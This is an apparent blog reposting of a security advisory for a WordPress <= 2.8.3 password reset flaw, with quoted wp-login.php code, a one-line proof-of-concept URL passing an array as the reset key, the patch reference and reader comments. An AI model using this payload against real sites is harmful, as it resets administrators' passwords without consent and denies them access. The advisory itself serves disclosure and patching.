WordPress <= 2.8.3 Remote admin reset password

How to annoy a wordpress admin? By changing his password without confirmation…

WordPress <= 2.8.3 Remote admin reset password

III. DESCRIPTION
————————-
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
WordPress send you a reset confirmation like that via email:


Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key;=o7naCKN3OoeU2KJMMsag

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users WHERE
user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST[‘action’]) ? $_REQUEST[‘action’] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET[‘key’]) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’, ‘retrievepassword’,
‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false ===
has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET[‘key’]);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error;=invalidkey’);
exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key variable.

IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key;[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

The patch? Just a one liner fix… http://core.trac.wordpress.org/changeset/11798. The problem? They are still using blacklists instead of a whilelist of what should be accepted…

14 comments
  1. I don't get it. You have to supply the email address that belongs to a registered user. Where it the hacker going to get that?

  2. I tried the function, and it sends an email to the registered user. Unless the registered user chooses to change the password it remains the same.

  3. It's telling the amount of kiddies trying this and failing. I can attest that it works, as I had my own blog's admin pass changed through an anon proxy, so it seems there are people actively exploiting this. I just fixed mine through the line 190 edit – thanks!

  4. OK, I think I see how it works now. I have a blog running 2.8.3. At login, I click "Lost your password?" and am presented with a page where I can enter either a username or an email. So entering "admin" would reset the password without further action? Weird!

    I've made the Line 190 edit and will start copying it to my blogs. Thanks, Securi, for this post.

  5. The vulnerability doesn’t exist . You can just “reset” the password but you cannot get any kind of access because you don’t know and don’t have access to the user email address so basically this is a stupid post . So thank you for more garbage on the internet streets !

    1. Nothing really-really bad happens, but somebody denying access to your own resources is an attack in my book.

  6. it exists but you must have an access to the database then disclosure the login and the activation key exemple with an sql injection vulnerabilty

Comments are closed.

You May Also Like